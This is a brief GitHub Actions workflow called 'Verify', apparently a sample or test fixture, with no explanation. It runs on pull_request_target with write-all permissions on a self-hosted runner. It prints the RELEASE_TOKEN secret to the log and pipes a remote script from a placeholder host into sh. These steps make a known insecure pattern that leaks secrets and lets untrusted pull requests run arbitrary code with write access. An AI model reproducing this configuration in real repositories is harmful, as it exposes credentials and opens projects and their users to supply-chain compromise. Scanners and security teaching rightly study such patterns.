name: Verify
on:
  pull_request_target:

permissions: write-all

jobs:
  build:
    runs-on: self-hosted
    steps:
      - uses: actions/checkout@main
      - run: echo "${{ secrets.RELEASE_TOKEN }}"
      - run: curl -fsSL https://example.invalid/setup | sh
